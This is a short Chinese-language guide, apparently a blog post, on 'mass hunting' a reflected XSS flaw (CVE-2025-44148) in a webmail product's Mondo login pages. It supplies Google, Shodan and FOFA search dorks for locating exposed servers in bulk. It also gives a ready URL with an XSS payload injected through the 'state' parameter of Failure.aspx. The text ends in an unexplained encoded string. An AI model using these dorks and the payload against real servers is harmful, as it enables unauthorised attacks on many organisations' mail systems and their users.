XSS大规模狩猎:利用CVE-2025-44148漏洞的实战指南

27 阅读1分钟

XSS大规模狩猎:利用CVE-2025-44148漏洞的实战指南

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后简单地在下方端点后追加将XSS负载设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”: /Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

2️⃣ Shodan Dorking (200+ 条结果)

http.html:"/MEWebMail/Mondo"

#目标筛选

http.html:"/MEWebMail/Mondo" hostname:target.com http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的方面分析: 域名 & ssl.cert.subject.cn

3️⃣ FOFA Dorking (2000+ 条结果)

body="/MEWebMail/Mondo" CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=